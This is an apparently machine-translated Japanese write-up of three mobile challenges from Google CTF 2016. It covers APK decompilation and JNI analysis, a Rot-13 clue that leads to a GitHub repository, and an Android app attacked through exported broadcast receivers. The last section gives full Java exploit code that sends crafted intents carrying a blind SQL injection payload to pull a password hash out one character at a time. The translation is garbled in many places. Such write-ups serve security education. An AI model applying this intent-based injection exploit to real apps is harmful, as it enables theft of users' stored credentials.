Google CTF 2016でのタスクの解析：モバイル

イントロ

Googleのフラッグキャプチャーコンペティションが最初に組織したGoogle Capture The Flag 2016は昨日終了しました。 競争は2日間続き、その間、提案されたタスクから可能な限り多くのフラグを絞り出す必要がありました。 競争形式はタスクベース/危険です。



Googleによると、このCTFのタスクは、Googleセキュリティチームの従業員である人々によって行われました。 したがって、これらのタスクおよび最初のGCTF全体に対する関心は非常に大きかった-合計で約2500チームが登録されたが、そのうち900チームのみがタスクを解決するために少なくとも5ポイントを獲得した（ボットと不正なプレイを数回試みた）。 誰でも参加できます。新人やセキュリティ愛好家から始まり、業界の伝説で終わります。 また、一人で参加することもできました。



2日間の大部分は、モバイルカテゴリのタスクを選択していました。 このハブには、このカテゴリのすべてのタスクの記事が掲載されています。 Googleはモバイル向けに3つのタスクしか提供していませんでした（5〜6だった）が、これからはおそらくさらに優れていた。



さて、水が終わった、ポイントに行きましょう:)

1.病気の意図

タスクは次のように聞こえます。

悪意はありますか？

Ill Intentions.APK

5〜300の難易度で、このタスクの成功したソリューションに対して150ポイントが提供されました。



だから、私たちの前にAPKがあり、それ以上は何もありません。 最初に思い浮かぶのは、エミュレーターにパッケージをインストールし、パッケージを逆コンパイルすることです。 これが私たちがやることです。

以下、技術的な詳細については説明しませんが、最近、完全に自動化されたAPK Studio GUIツールを使用して逆コンパイルすることが可能になったと言う価値があります。 これにより、逆コンパイルと後続のアセンブリ+署名APKのプロセスを自動化できます。 「オートマトン」全体が同じバンドルapktool + dex2jar +（java decompiler、たとえばjd）で構築されていることは明らかです。 しかし、私は「旧式」を好み、「apktool + dex2jar + jd-gui +（スクリプトのセット）」とも呼ばれるセミマニュアルモードでAPKを逆コンパイルします。



Android SDKの最小バージョンを見た後、エミュレータに「悪意」を設定しようとします。







私は自由に6番目のアンドロイド（マシュマロ）を使用したエミュレーターを持っていますが、1つ下のバージョンはなかったので、別の方法で行くことにしました。低レベルのSmaliコードをJavaコード（classes.dex->​​ JAR`nik）に変換し、javaソースからアプリケーションを再構築します。 しかし、すべてがとても甘いとは限りませんでした。



アプリケーションマニフェストを見ると：







そこには4つのアクティビティが表示されます。最初のアクティビティは興味のないもので、次の3つのアクティビティは自分の名前でフラグに関係していることを明確に示しています。 再構築されたJavaコードでこれらの3つを見てみると、興味深いことがわかります。







そして、問題は、フラグを計算するためのルーチンが部分的に低いコードレベル-JNIレベルに移動されることです。

さて、ネイティブC ++コードでcomputeFlag（）関数を見つけるために、あなたの手はすぐにかゆいです。 これを行うには、ネイティブライブラリ（.so）hello-jniを逆アセンブルする必要があります。

しかし、そこにあるもの（むしろ、そこにないもの）は喜ばないでしょう：







IDAはlib ...のcomputeFlag（）について語っていません。Javaコードでは、この関数への呼び出しはどこにもありません-インポートのみです。

このようにグーグルの人たちは一時停止しただけだと結論付けました=）



アプリケーションを再構築するという考えに戻ります（独自の同一APKを作成します）。 Javaコードの移行とその「オーバーホール」は問題ではありませんが、実際に作成できるのはネイティブ関数のインポートです。 彼らの名前はすでに高かったです、ここに彼らはあります：

• Java_com_example_application_IsThisTheRealOne_perhapsThis
• Java_com_example_application_ThisIsTheRealOne_orThat
• Java_com_example_application_DefinitelyNotThisOne_definitelyNotThis

最後の関数は、それ自体を物語っています（Googleの冗談は既に終了しています）-分解して見ると、静的な行"Told you so！"が返されていることがわかります。



ネイティブ関数の名前には、パッケージの名前+ Javaコードで呼び出すことができるクラスの名前が含まれます（それ以外の場合は、上位レベルのコードから関数を呼び出す段階でエラーが発生します）。 したがって、復元されたアプリケーションは、元のAPKで使用されている名前を正確に繰り返す必要があり、ネイティブJNI関数の呼び出しは、対応するJavaクラスから行われる必要があります。



これを知って、コードを復元しています。 ThisIsTheRealOneクラスとIsThisTheRealOneクラスのコードはほとんど同じです-onClick （）ボタンのクリックメソッドで文字列（フラグ？）を計算するルーチンのみが異なります （上記を参照）。

計算された行の出力をAndroidアプリケーションログの最後に追加して、クリックを処理するコードを変更します。

Log.d("CTF", i.getStringExtra("msg"));
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

アプリケーションをアセンブルしたら、ADBユーティリティAM（アクティビティマネージャー）を使用してアクティビティ（ThisIsTheRealOneおよびIsThisTheRealOne）を開く必要があります。これは、アプリケーションインターフェイスではGUIモードでこれを許可しないためです（ただし、5行のコードを追加することで修正できますが、怠lazです）。



ThisIsTheRealOneアクティビティから計算された文字列は次のとおりです。



KeepTryingThisIsNotTheActivityYouAreLookingForButHereHaveSomeInternetPoints!









そして、これはIsThisTheRealOneからです：



Congratulation!YouFoundTheRightActivityHereYouGo-CTF{IDontHaveABadjokeSorry}









Googleがひどく冗談を言っているのではないというフラグと一緒に。 再び冗談？ :)

2.リポジトリを作成できますか？

タスクは次のように聞こえます。

Ill Intentionsの開発者は、公開リポジトリを設定する方法を知っていると思いますか？

5〜300の難易度スケールでは、このタスクの成功したソリューションに対して5ポイントのみが提供されました。



「悪意」の調査中に、文字列を含むAndroidアプリケーションリソースファイルが手に入りました。 通常、興味深いことがたくさんありますが、今回も例外ではありませんでした。







フラグはすぐに目を引きます。その内容の頻度暗号解析は、これがおそらくCaesarの暗号であることを示しています。 実際、Rot-13はそうでしたが、グーグルは、5ポイントでさえも非常に簡単に与えられると本当に考えている人々に固執しています。 Rot-13を作成（Rot-13（））：

簡単だと思いましたか？

わかった よく考えなければなりません。 パブリックリポジトリを見つける必要があります。 ほとんどの場合、これはGitHubです。 また、オープンスペースでフラグを見つけるには、本当にユニークなもの（ユーザーまたはリポジトリの名前）が必要です。 まさにその真下がまさに「真にユニーク」なものです。



l33tdev42









単純なグーグルでは結果が得られませんが、最初はなんとなく疲れます...しかし、githubに移動して「l33tdev42」を検索すると、ユニークユーザーに出くわします。







3つのコミットを持つ1つのプロジェクトがあります...プロジェクトは素朴で、3つのコミットがあります：







最後のものの中には正しいフラグがあります：







ctf{TheHairCutTookALoadOffMyMind}









率直に言って、このようなタスクには5ポイントではまだ十分ではありません...

これはモバイルからの最初のタスクであり、ドラッグすることができました。 その後、150以上のタスクには、原則として解決できないタスクがあるように見えましたが、すでに述べたように、Googleはジョギングをしています:)

3.リトルボビーアプリケーション

タスクは次のように聞こえます。

脆弱性を見つけ、エクスプロイトを開発し、準備ができたら、

APKをbottle-brush-tree.ctfcompetition.comに送信します。

結果を返すまでに最大15分かかります。



BobbyApplication_CTF.apk



リンクで：

APKをアップロードし、ターゲットが悪意のあるAPKをロードするのを少し待って、ログを取得します...

5〜300の難易度で、このタスクの成功したソリューションに対して250ポイントが提供されました。



Androidアプリケーションの脆弱性を見つけ、エクスプロイトを作成し、このエクスプロイトを使用して実際のユーザーからフラグを引き出す必要があります。 エクスプロイトの正常性の分析は、サーバー上のエミュレーターで行われます。 平均13分後に、エクスプロイトアプリケーションのログが返されます。このログには、必要なものを何でも書き込むことができますが、もちろん、フラグを書き込む方が良いでしょう。

一見怖いですが、Googleが冗談を言っていることを忘れないでください。



ボビーアプリは次のようになります。







承認および登録するためのシンプルなフォーム。 さて、時間を逆コンパイルしてください！

逆コンパイルは、アプリケーションがSqliteを使用して、興味深いデザインのユーザーテーブルにデータを格納することを示しました。







フラグは、フラグを取得するために行う必要があるのは注入だけであると言います。

フラグの動的な部分は、ユーザーのパスワードからのmd5です。 最終フラグを「収集」するために、エクスプロイトを使用してこのハッシュを引き出す必要があります。



脆弱性を探しています。



このプロセスは十分に速く進みました。 アプリケーションには8つのクラスしか含まれていなかったため、脆弱なモジュールを見つけることは問題ではありませんでした。 この脆弱性は次のとおりです。起動時に、アプリケーションは外部から受信したブロードキャストイベントの受信者を登録しました。







次のコードを含むBroadcast下位クラスは、着信ブロードキャストのハンドラーでした。







次に 、着信ブロードキャストのハンドラーの本体からのcheckLogin（）メソッドの実装を示します 。







ご覧のとおり、メソッドもブロードキャストハンドラーも受信データをフィルター処理せず、データベースへの「生の」SQLクエリの生成に使用されます。

手動操作では、フォームを介してリクエストを変更できるセキュリティホールがあることが示されました。



明らかに、ブラインドSQLiの脆弱性に直面しています-checkLogin（）メソッドは入力に依存しない静的文字列を返します。

それでも、クエリによって選択されたレコードの数（エクスプロイトによって制御可能）に応じて、各悪意のあるリクエスト（およびデータベース自体について、一般的には何でも）に関するデータベーステーブルのフィールドに関する1ビットの情報を吸い出すことにより、このメソッドの動作を制御できます。しかし、前述のように、フラグの「アセンブリ」のパスワードフィールドに関心があります。



悪用を書いています。



エクスプロイトアルゴリズム：

1. Bobbyアプリケーションを起動して、ブロードキャストイベントレシーバーをトリガーする
2. 内部に「悪」データを持つ受信者向けの悪意を生成する
3. 悪意のあるデータを含む意図でブロードキャストイベントを送信する
4. 結果に関するボビーアプリケーションの受信者からの応答を受け取る
5. すべての必要なデータが象徴的に「吸い出される」まで繰り返します

このエクスプロイトを実装するには、2つのクラスで十分でした。 コードは小さいため、以下に示します。



エクスプロイトの主な活動：

 public class Main extends Activity { //       Unicode static int L = 0, R = (int)Math.pow(2,16); public static int symbolNum = 0; public static Main activity = null; public static StringBuilder flag = new StringBuilder(); public static void SendBroadcast() { if(Main.symbolNum>32) { Main.Finish(); return; } //   . //         int M = (L+R)/2; Intent maliciousIntent = new Intent(); maliciousIntent.setAction("com.bobbytables.ctf.myapplication_INTENT"); maliciousIntent.putExtra("username", "???\" or unicode(substr(password," + symbolNum + ",1))>" + M + " -- "); maliciousIntent.putExtra("password", "1"); activity.sendBroadcast(maliciousIntent); } public static void Finish() { //      Log.d("FLAG", Main.flag.toString()); Main.activity.finish(); } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); activity = this; //    ()  onReceive() Bobby- IntentFilter filter = new IntentFilter("com.bobbytables.ctf.myapplication_OUTPUTINTENT"); registerReceiver(new MalReceiver(), filter); //  Bobby- // (  -  ,      ) PackageManager pm = getPackageManager(); Intent intent = pm.getLaunchIntentForPackage("bobbytables.ctf.myapplication"); if (intent != null){ startActivity(intent); } //   ,        Handler handler = new Handler(); handler.postDelayed(new Runnable() { @Override public void run() { SendBroadcast(); } }, 2000); } }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ボビーレスポンスレシーバー：

 public class MalReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { //    Bobby- String answer = intent.getStringExtra("msg"); // SQL TRUE if(answer.compareToIgnoreCase("Incorrect password")==0) { //   Main.L = (Main.L + Main.R)/2; } // SQL FALSE else{ //   Main.R = (Main.L + Main.R)/2; } //  N-    if(Main.R-Main.L <= 1) { Main.flag.append((char)Main.R); Main.symbolNum++; Main.L = 0; Main.R = (int)Math.pow(2,16); } Main.SendBroadcast(); } }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

その後、テスト対象のサーバーにエクスプロイトを送信するだけです。

15分で...



Googleは、次の情報を含む待望のログを返します。







それは些細な問題のままです-結果のハッシュをフラグに置き換えます：



ctf{An injection is all you need to get this flag - 106b826d7d5ec465b0c5d385a41c6ff6}









以上です。



ここで、このタスクを解決しようとした人をGoogleがいかに軽quしたかについて少し説明します。 AndroidエミュレーターのBobbyアプリケーションでエクスプロイトを開始した直後、サーバーで猿が起動し（返されたログに表示されていました）、システムのすべてのコンポーネントをランダムなアクションで「爆撃」しました。エクスプロイトアクティビティ。 最初は、エクスプロイトを中断した原因は明確ではありませんでした-ログにクラッシュに関するエラーはなく、時間制限があるように見えました。 とにかく、私はわずか3回の試行でフラグをうまく吸い上げることができました。



上記の博覧会コードには、一般的な概念を示す最​​小限のアクションのセットがあります。

実際に実際に起こったことには、サルから保護するため、ボビー側での複数のレシーバーインスタンスの起動を禁止するためなど、大量のコードが含まれています。

アウトロ

モバイルアプリケーションのセキュリティに焦点を当てたため、Googleの「楽しい」タスクを十分に理解することはできませんでしたが、克服しなければならなかったことに基づいて、GCTFは非常に興味深いものであり、多くの点で関心が寄せられたと言えます参加者に対する冗談の試み。 そのような瞬間に、あなたが再び「beatられた」ことを理解すると、あなたはある種の「黒」の動機のラッシュを感じます=）



ありがとう、グーグル、面白かった;）